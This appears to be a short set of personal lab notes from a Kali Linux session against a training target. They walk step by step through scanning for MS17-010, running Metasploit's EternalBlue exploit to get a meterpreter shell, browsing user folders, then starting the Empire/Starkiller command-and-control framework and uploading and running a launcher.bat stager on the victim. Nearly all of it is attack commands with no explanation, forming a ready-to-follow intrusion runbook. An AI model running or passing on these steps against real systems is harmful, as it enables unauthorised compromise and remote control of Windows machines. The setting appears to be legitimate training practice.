Date:10/mar/2021
Time:10:28

 sudo msfconsole -q
msf6 > search eternalblue
msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.225.164
RHOSTS => 10.10.225.164
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
msf6 auxiliary(scanner/smb/smb_ms17_010) > search eternalblue
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.225.164
RHOSTS => 10.10.225.164
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
meterpreter > cd Users
meterpreter > dirmeterpreter > cd Jon
meterpreter > dir

┌──(liki㉿kali)-[~/Documents/TOOLS]
└─$ sudo ./starkiller-1.6.0.AppImage --no-sandbox 

┌──(liki㉿kali)-[/opt/Empire]
└─$ sudo ./empire --rest  

sudo python -m SimpleHTTPServer 80
meterpreter > upload launcher.bat
meterpreter > shell
C:\Users\Jon\Downloads>.\launcher.bat
.\launcher.bat


